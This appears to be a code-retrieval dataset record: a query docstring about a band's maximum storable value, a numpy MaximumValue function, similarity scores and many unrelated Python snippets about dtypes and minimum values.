dtype():\n return RaggedDtype()", "def dtype(self):\n return self._channel.datatype", "def dtype(self):\n return self._fl.raw.dtype", "def dtype(self):\n return self.data.dtype", "def type(self):\n return _python_type_map[self.arrow_dtype.id]", "def datatype_name(self):\n return 'array'", "def dtype(self):\n return self._data.dtype", "def dtype(self):\n return self._data.dtype", "def dtype(self):\n return self.array.dtype", "def nptype2gdal(dtype):\n if dtype == np.float32:\n return gdal.GDT_Float32\n elif dtype == np.float64:\n return gdal.GDT_Float64\n elif dtype == np.int32:\n return gdal.GDT_Int32\n elif dtype == np.bool or dtype == np.uint8:\n return gdal.GDT_Byte\n return gdal.GDT_Float64", "def kind(self):\n # type () -> str\n return np.dtype(self.type).kind", "def data_type(self):\n try:\n return self.attributes.workspace.attributes['library:datatype']['items']\n except Exception as e:\n self._logger.debug(f\"data_category {e}\")\n return None", "def data_type():\n return DataTypeUtil.getDTypeForName(DataTypeUtil.getDtypeFromContext())", "def dtype(self):\n return self._dtype", "def dtype(self) -> DtypeLike:\n\n return self.data.dtype", "def datatype(self):\n # datatype is type of first dataarg\n return self[self.dataargs()[0]].typename", "def dtype(a):\n return a.dtype", "def dtype(self) -> DataType:\n return self._dtype", "def dtype(self):\n return self.MJD.dtype", "def dtype(self):\n return self.config[\"dtype\"]", "def type(self) -> DataType:\n return self._type", "def numpy_type(sqltype):\n m = re.match(\"char\\(([0-9]+)\\)\", sqltype.strip())\n if m is not None:\n # It's a string\n return np.dtype(\"|S\"+m.group(1))\n else:\n # It's a numeric type\n if sqltype == \"integer\" or sqltype == \"int\":\n return np.int32\n elif sqltype == \"bigint\":\n return np.int64\n elif sqltype == \"real\":\n return np.float32\n elif sqltype == \"float\":\n return np.float64\n else:\n raise ValueError(\"Unsupported data type \"+sqltype)", "def data_type(self):\r\n return self._data_type", "def dtype(self):\n return self._dtype", "def dtype(self):\n return self._dtype", "def dtype(self):\n return self._dtype", "def getDataType(self):\n\n return self._dataType", 
"def dtype(self):\n # type: () -> ExtensionDtype\n return self._dtype", "def dtype(self) -> str:\n return self._dtype", "def get_dtype(arr, backend='autograd'):\n if backend == 'pytorch':\n return pytorch_dtype_query_mapping_dict[arr.dtype]\n elif backend == 'autograd':\n return str(arr.dtype)", "def dtype(self):\n if self.num_polygons < 2 ** 8:\n dtype = numpy.uint8\n elif self.num_polygons < 2 ** 16:\n dtype = numpy.uint16\n else:\n dtype = numpy.uint32\n return dtype", "def data_type(self):\n return self._data_type", "def data_type(self):\n return self._data_type", "def data_type(self):\n return self._data_type", "def dtype(self) -> np.dtype:\n return self._channel_arrays[0].dtype", "def dtype(basis: Basis) -> FDataBasisDType:\n return FDataBasisDType(basis=basis)", "def typecode (self) :\r\n return self.numeric_typecode", "def type(self):\n return struct.unpack('<B', self.raw_data[0])[0]", "def _nd4j_datatype_from_np_array(array):\n return _nd4j_datatype_from_np(array.dtype.name)", "def type(self) -> np.dtype:\n return self._tensorInfo.dtype", "def GetType(vDataSet):\r\n return imaris_types[str(vDataSet.GetType())]", "def type(self) -> 'Data_Type':\n return Data_Type(self._info.htype, self._info.ptype)", "def dtype(self):\n return self.__dtype", "def getTypeCode(self):\n return _libsbml.Dimensions_getTypeCode(self)", "def data_type(self) -> pulumi.Input['AssetModelDataType']:\n return pulumi.get(self, \"data_type\")", "def to_numpy(self) -> np.dtype:\n return self._numpy_type", "async def get_dtype(self):\r\n pass", "def data_type(x):\n return (\n DATA_TYPES.get(file_format(x)) or\n DATA_TYPES.get(genomic_file_ext(x))\n )", "def dataType(self, data):\n if isinstance(data,str):\n return STRING\n elif isinstance(data,dict):\n return ASSOC\n elif isinstance(data,int) or isinstance(data,float):\n return STRING\n elif is_python2() and isinstance(data,long):\n return STRING\n elif isinstance(data, SpecArray.SpecArrayData):\n self.rows, self.cols = data.shape\n return data.type", "def dtype(self) -> np.dtype:\n ...", "def getDataSetType(self):\n return self.__data_set_type__", "def np_dtype(dali_dtype):\n return numpy.dtype(dali_dtype)", "def datatype(self) -> MetricTypeEnum:\n return self._datatype", "def dtype(self) -> tf.dtypes.DType:", "def datatype(self):\n return self._datatype", "def data_type(self) -> int:\n return self.data[\"args\"][\"dataType\"]", "def dtype(self) -> Type[DTypeFloat]:\n\n return self._dtype", "def type(self):\n # easy enough\n return self._dataset._pyre_id.type", "def dtype(self) -> np.dtype:\n return self._dtype", "def datatype(self):\n hcell = self._get_hcell2()\n celltype = hcell[\"celltype\"]\n assert celltype == \"structured\"\n return hcell[\"datatype\"]", "def dtype(self):\n return self.initial_value.dtype", "def recarrtype(self):\n return str(self.dtype.shape) + self.dtype.base.str[1:]", "def type(self):\n return self.data.type", "def data_type(self):\n return self.unpack_dword(0xC) & DEVPROP_MASK_TYPE", "def _dtype(self):\n if self._dtype_ is not None:\n return self._dtype_\n dtype = None\n for raw_extra, filename in zip(self._raw_extras, self._filenames):\n for ent in raw_extra[\"ent\"]:\n if ent is not None:\n with _fiff_get_fid(filename) as fid:\n fid.seek(ent.pos, 0)\n tag = read_tag_info(fid)\n if tag is not None:\n if tag.type in (\n FIFF.FIFFT_COMPLEX_FLOAT,\n FIFF.FIFFT_COMPLEX_DOUBLE,\n ):\n dtype = np.complex128\n else:\n dtype = np.float64\n if dtype is not None:\n break\n if dtype is not None:\n break\n if dtype is None:\n raise 
RuntimeError(\"bug in reading\")\n self._dtype_ = dtype\n return dtype", "def get_data_type(self, col):\n if ((self.data_df[col].dtype == np.int64) or (self.data_df[col].dtype == np.int32)):\n return 'int'\n elif ((self.data_df[col].dtype == np.float64) or (self.data_df[col].dtype == np.float32)):\n return 'float'\n else:\n raise ValueError(\"Unknown data type of feature %s: must be int or float\" % col)", "def basetype(series):\n if not series.dtype == types.ObjectType:\n # Type is specific already; return it without further inspection.\n return series.dtype\n # Now type is Object (string) See if any more specific type can be deduced:", "def astype(self, dtype):\n return type(self)(self.data.astype(dtype), self.bset)", "def form_datatype(self):\n et = get_lh5_element_type(self)\n return 'array<1>{array<1>{' + et + '}}'", "def _determine_dtype(self, b):\n if 64 < b or 1 > b:\n raise ValueError('b-Bit size must be 1 <= b <= 64')\n elif b > 32:\n return np.int64\n elif b > 16:\n return np.int32\n elif b > 8:\n return np.int16\n elif b > 1:\n return np.int8\n return np.bool", "def dtype(self) -> np.dtype[np.void]:\n return np.dtype(list(self.items()))", "def dtype_type( dtype, name = None ):\n if name:\n for property in dtype.descr:\n if property[ 0 ] == name:\n return property[ 1 ]\n raise ValueError( \"Property not found\" )\n else:\n if len( dtype.descr ) > 1:\n raise ValueError( \"Multiple types present\" )\n\n return dtype.descr[ 0 ][ 1 ]", "def get_var_type(self, var_name):\n return str(self.get_value_ref(var_name).dtype)", "def ogrtype2npytype(ogrtype):\n if ogrtype == ogr.OFTReal:\n return np.float64\n elif ogrtype == ogr.OFTInteger:\n return np.int32\n raise TypeError(\"OGR type cannot be mapped to a numpy dtype.\")", "def kind(self):\n # type () -> str\n if pa.types.is_date(self.arrow_dtype):\n return \"O\"\n else:\n return np.dtype(self.arrow_dtype.to_pandas_dtype()).kind", "def datatype(f):\n from numpy import bool, uint8, uint16, int32\n code = f.dtype\n if code == bool: type='binary'\n elif code == uint8: type='uint8'\n elif code == uint16: type='uint16'\n elif code == int32: type='int32'\n else:\n assert 0,'Does not accept this typecode: %s' % code\n return type", "def get_dimension_type(self, dim):\n dim = self.get_dimension(dim)\n if dim is None:\n return None\n elif dim.type is not None:\n return dim.type\n elif dim in self.vdims:\n return np.float64\n return self.interface.dimension_type(self, dim)", "def test_out_dtype(self):\n byt = bytscl(self.array1)\n dtype = byt.dtype\n self.assertEqual(dtype, 'uint8')", "def arrayToGLType( cls, value ):\n typeCode = value.dtype\n constant = ARRAY_TO_GL_TYPE_MAPPING.get( typeCode )\n if constant is None:\n raise TypeError(\n \"\"\"Don't know GL type for array of type %r, known types: %s\\nvalue:%s\"\"\"%(\n typeCode, list(ARRAY_TO_GL_TYPE_MAPPING.keys()), value,\n )\n )\n return constant", "def get_sensor_type(self):\n return self.data[1][:-1]", "def base_dtype(self):\r\n _base_dtype = [\r\n (ptidCol, '<i8'),\r\n (surveyidCol, 'S25'),\r\n (siteCol, 'S10'),\r\n (tranCol, '<i4'),\r\n (datetimeCol, '<M8[us]'),\r\n (dateCol, 'S12'),\r\n (timeCol, 'S11'),\r\n (latCol, '<f8'),\r\n (lonCol, '<f8'),\r\n (depObsCol, '<f8'),\r\n (depInterpCol, '<f8'),\r\n (videoCol, '<i4'),\r\n ]\r\n return _base_dtype", "def data_type_spec(self) -> Optional[pulumi.Input['AssetModelDataTypeSpec']]:\n return pulumi.get(self, \"data_type_spec\")", "def pixeltype(self):\n return _image.image_pixeltype(self)", "def data_type_id(self) -> str:\n return 
self._data_type_id", "def dtype_to_type(dtype) -> Type:\n if dtype == np.object:\n return str\n else:\n return type(np.zeros(1, dtype).item())", "def get_dtype(col):\n dtype = col.dtype\n\n if isinstance(dtype, CategoricalDtype):\n col = col.astype(type(col.values[0]))\n out = get_dtype(col)\n elif np.issubdtype(dtype, np.floating):\n out = 'float32'\n elif np.issubdtype(dtype, np.integer):\n if col.max() < 32767:\n out = 'int16'\n else:\n out = 'int32'\n elif np.issubdtype(dtype, np.object_):\n size = int(col.astype(str).str.len().max())\n out = 'S{:}'.format(size)\n else:\n out = dtype\n\n return out", "def convert_numpy_type(cls, dtype):\n\n import numpy as np\n\n m = {\n 'int64': cls.DATATYPE_INTEGER64,\n 'float64': cls.DATATYPE_FLOAT,\n 'object': cls.DATATYPE_TEXT # Hack. Pandas makes strings into object.\n\n }\n\n t = m.get(dtype.name, None)\n\n if not t:\n raise TypeError(\n \"Failed to convert numpy type: '{}' \".format(\n dtype.name))\n\n return t", "def geometry_type(number):\n try:\n return GDAL_GEOMETRY_TYPES[number]\n except KeyError:\n return", "def datatype(parameter):\n return type(parameter)", "def dtype_ref(self):\n return self._dtype_ref" ]
[ "0.7380224", "0.7158212", "0.6904815", "0.68386203", "0.67266405", "0.6708839", "0.66951716", "0.663477", "0.663243", "0.6614309", "0.6602418", "0.6594213", "0.65762633", "0.65756744", "0.65720206", "0.657198", "0.6555877", "0.6555877", "0.6546687", "0.65154874", "0.6515137", "0.6498225", "0.6493472", "0.6466837", "0.6455337", "0.6454839", "0.6453198", "0.6451606", "0.643996", "0.6423948", "0.64215165", "0.64212596", "0.640249", "0.6401839", "0.6401839", "0.6401839", "0.6401397", "0.6385074", "0.63768667", "0.6376779", "0.6369398", "0.63643914", "0.63643914", "0.63643914", "0.63552743", "0.63526255", "0.6332715", "0.6330258", "0.62927747", "0.627919", "0.6273387", "0.62716174", "0.62577516", "0.62504685", "0.6245434", "0.62114185", "0.62076026", "0.61964643", "0.61881423", "0.6175947", "0.6168868", "0.6151739", "0.61351687", "0.6133396", "0.6118896", "0.6083055", "0.60808295", "0.6067263", "0.60625273", "0.6040692", "0.6025394", "0.6008395", "0.6007711", "0.5972361", "0.59317416", "0.5924599", "0.591985", "0.58971864", "0.5857541", "0.585655", "0.5846714", "0.58189565", "0.5803598", "0.57848287", "0.5770629", "0.57440484", "0.57424396", "0.57290524", "0.57259095", "0.5721711", "0.5702034", "0.568362", "0.5680798", "0.5676757", "0.5650429", "0.5647226", "0.56313425", "0.56152123", "0.56072325", "0.55883914" ]
0.76264346
0
Returns the minimum value that can be stored in this band
def MinimumValue(self): datatype = self.NumPyDataType if issubclass(datatype, numpy.integer): return numpy.iinfo(datatype).min elif issubclass(datatype, numpy.floating): return -numpy.inf else: raise TypeError("Cannot handle DataType: {0}".format(datatype))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def min(self):\n if self.kind == 'u':\n return 0\n else:\n try:\n val = iinfo._min_vals[self.key]\n except KeyError:\n val = int(-(1 << (self.bits-1)))\n iinfo._min_vals[self.key] = val\n return val", "def min(self):\n if self.kind == 'u':\n return 0\n else:\n try:\n val = iinfo._min_vals[self.key]\n except KeyError:\n val = int(-(1 << (self.bits-1)))\n iinfo._min_vals[self.key] = val\n return val", "def _get_minimum(self):\n return self._minimum", "def minimum_value(self):\n return self._fitness[self._minidx]", "def MinimumValue(self):\n return self._fitness[self._minIndex]", "def _get_minimum_value(self):\n if hasattr(self, '_minimum_value'):\n return self._minimum_value\n return None", "def _minimum(self) -> float:\n if self._type == \"power\":\n return 1.0\n elif self._type == \"setpoint\":\n return self._product.get_data_config_json()[\"_value_setpoint_min\"]\n elif self._type == \"fan1\":\n fan = 1\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]\n elif self._type == \"fan2\":\n fan = 2\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]\n elif self._type == \"fan3\":\n fan = 3\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]", "def getMinValue(self):\n return self.MIN_VALUE", "def min_value(self) -> Union[int, float]:\n return self.left_boundary['value']", "def get_min(self):\n return self.serie.min()", "def get_min(self):\n\t\tif self.left:\n\t\t\treturn self.left.get_min()\n\t\treturn self.value", "def min(self) -> Union[float, int, str]:\n return self._data.min()", "def min(self):\n return self._min", "def min(self):\n return self._min", "def min(self):\n return self.__min", "def min(self):\r\n return np.min(self.data_array)", "def find_min(self):\n return self.min", "def find_min(self):\n return self.min", "def min(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"min\")", "def min(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"min\")", "def min(self):\n return numpy.ma.min(self.data)", "def min_value(self) -> float:\n return DEFAULT_MIN_VALUE", "def minimum(self) -> Union[int, float]:\n return self.range[0]", "def min(self):\r\n\t\treturn min(self.sample)", "def min(self):\n return min(self)", "def min(self):\n least = self.data[0]\n \n for i in range(len(self.data)):\n if self.data[i] < least:\n least = self.data[i]\n return least", "def minimum(self):\n return self.properties.get('minimum')", "def min(self):\n return self._reduce_for_stat_function(F.min, only_numeric=False)", "def native_min_value(self) -> float:\n return TEMP_MINIMUM", "def min(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"min\")", "def min(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"min\")", "def Min(data):\n return data.min()", "def min(self):\n return self.get_first()", "def getmin(self):\n\n return self.X", "def min(self) -> float:\n return stats.min(self)", "def native_min_value(self) -> float:\n return -9", "def get_min(self):\r\n df = pd.read_csv(\"MonthlyRate.csv\")\r\n df = df[df.CurrencyCode == self.choice]\r\n minimum = df.min(axis=1).values[0]\r\n # Round the value to 4 d.p.\r\n minimum = round(float(minimum), 4)\r\n return minimum", "def min_flux(self):\n return np.min(self.flux)", "def _minimum(self) -> float:\n return self._config[CONF_MIN]", "def getMinValue(self):\n if self.left is None:\n return self.data\n return self.left.getMinValue()", "def get_min_value(self, dim):\n return self._min_values[dim]", "def 
get_min(self):\n if not self:\n return None\n return self.left.get_min() if self.left else self.value #Ternarary Operator", "def native_min_value(self) -> float:\n return self._device.min_offset", "def x_min(self):\n return self.get_min_value(self.X_INDEX)", "def get_min(self):\n min_value= self.df[self.col_name].min()\n return min_value", "def z_min(self):\n return self.get_min_value(self.Z_INDEX)", "def get_min(self):\n raise NotImplementedError(\"This is an abstract method and needs to be implemented in derived classes.\")", "def min():\n return KeeperOfMinOrMax(int.__gt__)", "def minimum(self):\n return min(self.numbers)", "def min(self):\n a = self.array_form\n min = len(a)\n for i in xrange(len(a)):\n if a[i] != i and a[i] < min:\n min = a[i]\n return min", "def min(self):\n if 0 in type(self).flatten_shape(self.shape):\n raise ValueError(\"zero-size array has no minimum\")\n if self.isscalar():\n return self.defval\n # If not all blocks are set, then the tensor has an element of defval\n # somewhere.\n m = np.inf if self.is_full() else self.defval\n for v in self.sects.values():\n try:\n m = min(m, np.min(v))\n except ValueError:\n # This block was zero-size, and has no elements.\n pass\n return m", "def state_min(self) -> float:\n raise NotImplementedError", "def cmin(self):\n return self[\"cmin\"]", "def cmin(self):\n return self['cmin']", "def accepted_minimum(self):\n\n return self._get_value(self.accepted_minimum_provider)", "def get_f_minimum(self):\n return np.min(self._Y)", "def min_value(dtype):\n return _api_internal._min_value(dtype)", "def minX(self):\n return min(self.getx())", "def take_min(self):\n return self.get_first()", "def peek_min(self):\n if self.root:\n return self.root.min().value\n raise ValueError(\"cannot perform peek_min on an empty tree\")", "def min(self) -> \"Stream[float]\":\n return self.agg(np.min).astype(\"float\")", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL3_GetMinimum(self)", "def find_min(self):\n return min(self.nodes, key=int)", "def get_min(cls, data: tuple or list) -> float:\n cls._data_validation(data)\n return min(data)", "def getMin(self, field): \n return np.min([self.fitnesses[i][field] for i in range(len(self.fitnesses))])", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL2_GetMinimum(self)", "def x_min(self) -> ir.FloatingValue:\n return ops.GeoXMin(self).to_expr()", "def getMinX(self):\n return self.minx", "def get_fmin(self):\n return self.model.predict(self.model.X)[0].min()", "def potential_min(self):\n\n return self._args.min", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS3_GetMinimum(self)", "def vmin(self):\n return self._vmin", "def extractMinimum(self):\n\n return self.heap[1]", "def min(self):\n raise NotImplementedError('must be implemented by subclass')", "def min(self):\n raise NotImplementedError('must be implemented by subclass')", "def find_min(self):\n\n if self.left:\n return self.left.find_min()\n\n return self.data", "def get_tmin(self):\n tmin = min(sorted(self.srcData.keys()))\n return tmin", "def userMinimum(self) -> float:\n return self._user_minimum", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> 
Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def minimum_number(self):\n return self._minimum_number", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS2_GetMinimum(self)", "def min_level(self):\n return self.__min", "def min(self):\n return self._summarize(DataFrameCpu._cmin)", "def min_rec(self):\n return self._min_rec", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUC3_GetMinimum(self)", "def min(self):\n return self._min_coords", "def _min_in_bounds(self, min):\n if min <= self.valmin:\n if not self.closedmin:\n return self.val[0]\n min = self.valmin\n\n if min > self.val[1]:\n min = self.val[1]\n return self._stepped_value(min)", "def min(self):\n return self.heap[1]" ]
[ "0.7944226", "0.7944226", "0.7937631", "0.78972983", "0.7884411", "0.78611416", "0.7846386", "0.7778144", "0.77733576", "0.7762124", "0.7680303", "0.7642864", "0.75792414", "0.75792414", "0.75784636", "0.7551094", "0.75474113", "0.75474113", "0.7521111", "0.7521111", "0.74849975", "0.7484885", "0.7471194", "0.7461117", "0.74487036", "0.7446084", "0.744392", "0.74194586", "0.7390895", "0.73744524", "0.73744524", "0.73413813", "0.7310355", "0.7296167", "0.7289322", "0.7249265", "0.7248786", "0.72440404", "0.7236522", "0.7224943", "0.72162694", "0.72142404", "0.7209117", "0.71570104", "0.7145454", "0.714173", "0.71323127", "0.7109216", "0.70772934", "0.70617133", "0.70600265", "0.70433307", "0.7028071", "0.70215166", "0.70111954", "0.6988008", "0.69834995", "0.6979648", "0.6968356", "0.69448626", "0.694202", "0.69383395", "0.69209516", "0.6905302", "0.6903685", "0.6900909", "0.6896162", "0.6874685", "0.6870821", "0.6850932", "0.68279237", "0.6827528", "0.6824322", "0.68122953", "0.68122953", "0.68073714", "0.68069035", "0.6802727", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67865294", "0.67865294", "0.67865294", "0.67865294", "0.67847824", "0.67812485", "0.6780029", "0.6770788", "0.6767305", "0.6761661", "0.67479265", "0.6722724", "0.67219627" ]
0.7393505
28
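The MinimumValue record above boils down to numpy type introspection. A minimal standalone sketch of the same idea, assuming plain numpy scalar types rather than the dataset's Band wrapper (the helper name minimum_value is illustrative only):

import numpy

def minimum_value(datatype):
    # Integer dtypes have a hard lower bound reported by iinfo;
    # floating-point dtypes are treated as unbounded below (-inf).
    if issubclass(datatype, numpy.integer):
        return numpy.iinfo(datatype).min
    if issubclass(datatype, numpy.floating):
        return -numpy.inf
    raise TypeError("Cannot handle DataType: {0}".format(datatype))

print(minimum_value(numpy.uint8))    # 0
print(minimum_value(numpy.int16))    # -32768
print(minimum_value(numpy.float32))  # -inf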
Returns the maximum value that can be stored in this band
def MaximumValue(self): datatype = self.NumPyDataType if issubclass(datatype, numpy.integer): return numpy.iinfo(datatype).max elif issubclass(datatype, numpy.floating): return numpy.inf else: raise TypeError("Cannot handle DataType: {0}".format(datatype))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def min(self):\n if self.kind == 'u':\n return 0\n else:\n try:\n val = iinfo._min_vals[self.key]\n except KeyError:\n val = int(-(1 << (self.bits-1)))\n iinfo._min_vals[self.key] = val\n return val", "def min(self):\n if self.kind == 'u':\n return 0\n else:\n try:\n val = iinfo._min_vals[self.key]\n except KeyError:\n val = int(-(1 << (self.bits-1)))\n iinfo._min_vals[self.key] = val\n return val", "def _get_minimum(self):\n return self._minimum", "def minimum_value(self):\n return self._fitness[self._minidx]", "def MinimumValue(self):\n return self._fitness[self._minIndex]", "def _get_minimum_value(self):\n if hasattr(self, '_minimum_value'):\n return self._minimum_value\n return None", "def _minimum(self) -> float:\n if self._type == \"power\":\n return 1.0\n elif self._type == \"setpoint\":\n return self._product.get_data_config_json()[\"_value_setpoint_min\"]\n elif self._type == \"fan1\":\n fan = 1\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]\n elif self._type == \"fan2\":\n fan = 2\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]\n elif self._type == \"fan3\":\n fan = 3\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]", "def getMinValue(self):\n return self.MIN_VALUE", "def min_value(self) -> Union[int, float]:\n return self.left_boundary['value']", "def get_min(self):\n return self.serie.min()", "def get_min(self):\n\t\tif self.left:\n\t\t\treturn self.left.get_min()\n\t\treturn self.value", "def min(self) -> Union[float, int, str]:\n return self._data.min()", "def min(self):\n return self._min", "def min(self):\n return self._min", "def min(self):\n return self.__min", "def min(self):\r\n return np.min(self.data_array)", "def find_min(self):\n return self.min", "def find_min(self):\n return self.min", "def min(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"min\")", "def min(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"min\")", "def min(self):\n return numpy.ma.min(self.data)", "def min_value(self) -> float:\n return DEFAULT_MIN_VALUE", "def minimum(self) -> Union[int, float]:\n return self.range[0]", "def min(self):\r\n\t\treturn min(self.sample)", "def min(self):\n return min(self)", "def min(self):\n least = self.data[0]\n \n for i in range(len(self.data)):\n if self.data[i] < least:\n least = self.data[i]\n return least", "def minimum(self):\n return self.properties.get('minimum')", "def min(self):\n return self._reduce_for_stat_function(F.min, only_numeric=False)", "def MinimumValue(self):\n datatype = self.NumPyDataType\n if issubclass(datatype, numpy.integer):\n return numpy.iinfo(datatype).min\n elif issubclass(datatype, numpy.floating):\n return -numpy.inf\n else:\n raise TypeError(\"Cannot handle DataType: {0}\".format(datatype))", "def native_min_value(self) -> float:\n return TEMP_MINIMUM", "def min(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"min\")", "def min(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"min\")", "def Min(data):\n return data.min()", "def min(self):\n return self.get_first()", "def getmin(self):\n\n return self.X", "def min(self) -> float:\n return stats.min(self)", "def native_min_value(self) -> float:\n return -9", "def get_min(self):\r\n df = pd.read_csv(\"MonthlyRate.csv\")\r\n df = df[df.CurrencyCode == self.choice]\r\n minimum = df.min(axis=1).values[0]\r\n # Round the value to 4 d.p.\r\n minimum = round(float(minimum), 4)\r\n return minimum", "def 
min_flux(self):\n return np.min(self.flux)", "def _minimum(self) -> float:\n return self._config[CONF_MIN]", "def getMinValue(self):\n if self.left is None:\n return self.data\n return self.left.getMinValue()", "def get_min_value(self, dim):\n return self._min_values[dim]", "def get_min(self):\n if not self:\n return None\n return self.left.get_min() if self.left else self.value #Ternarary Operator", "def native_min_value(self) -> float:\n return self._device.min_offset", "def x_min(self):\n return self.get_min_value(self.X_INDEX)", "def get_min(self):\n min_value= self.df[self.col_name].min()\n return min_value", "def z_min(self):\n return self.get_min_value(self.Z_INDEX)", "def get_min(self):\n raise NotImplementedError(\"This is an abstract method and needs to be implemented in derived classes.\")", "def min():\n return KeeperOfMinOrMax(int.__gt__)", "def minimum(self):\n return min(self.numbers)", "def min(self):\n a = self.array_form\n min = len(a)\n for i in xrange(len(a)):\n if a[i] != i and a[i] < min:\n min = a[i]\n return min", "def min(self):\n if 0 in type(self).flatten_shape(self.shape):\n raise ValueError(\"zero-size array has no minimum\")\n if self.isscalar():\n return self.defval\n # If not all blocks are set, then the tensor has an element of defval\n # somewhere.\n m = np.inf if self.is_full() else self.defval\n for v in self.sects.values():\n try:\n m = min(m, np.min(v))\n except ValueError:\n # This block was zero-size, and has no elements.\n pass\n return m", "def state_min(self) -> float:\n raise NotImplementedError", "def cmin(self):\n return self[\"cmin\"]", "def cmin(self):\n return self['cmin']", "def accepted_minimum(self):\n\n return self._get_value(self.accepted_minimum_provider)", "def get_f_minimum(self):\n return np.min(self._Y)", "def min_value(dtype):\n return _api_internal._min_value(dtype)", "def minX(self):\n return min(self.getx())", "def take_min(self):\n return self.get_first()", "def peek_min(self):\n if self.root:\n return self.root.min().value\n raise ValueError(\"cannot perform peek_min on an empty tree\")", "def min(self) -> \"Stream[float]\":\n return self.agg(np.min).astype(\"float\")", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL3_GetMinimum(self)", "def find_min(self):\n return min(self.nodes, key=int)", "def get_min(cls, data: tuple or list) -> float:\n cls._data_validation(data)\n return min(data)", "def getMin(self, field): \n return np.min([self.fitnesses[i][field] for i in range(len(self.fitnesses))])", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL2_GetMinimum(self)", "def x_min(self) -> ir.FloatingValue:\n return ops.GeoXMin(self).to_expr()", "def getMinX(self):\n return self.minx", "def get_fmin(self):\n return self.model.predict(self.model.X)[0].min()", "def potential_min(self):\n\n return self._args.min", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS3_GetMinimum(self)", "def vmin(self):\n return self._vmin", "def extractMinimum(self):\n\n return self.heap[1]", "def min(self):\n raise NotImplementedError('must be implemented by subclass')", "def min(self):\n raise NotImplementedError('must be implemented by subclass')", "def find_min(self):\n\n if self.left:\n return self.left.find_min()\n\n return self.data", "def get_tmin(self):\n tmin = min(sorted(self.srcData.keys()))\n return tmin", "def userMinimum(self) -> float:\n return self._user_minimum", "def minimum(self) -> 
Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def minimum_number(self):\n return self._minimum_number", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS2_GetMinimum(self)", "def min_level(self):\n return self.__min", "def min(self):\n return self._summarize(DataFrameCpu._cmin)", "def min_rec(self):\n return self._min_rec", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUC3_GetMinimum(self)", "def min(self):\n return self._min_coords", "def _min_in_bounds(self, min):\n if min <= self.valmin:\n if not self.closedmin:\n return self.val[0]\n min = self.valmin\n\n if min > self.val[1]:\n min = self.val[1]\n return self._stepped_value(min)", "def min(self):\n return self.heap[1]" ]
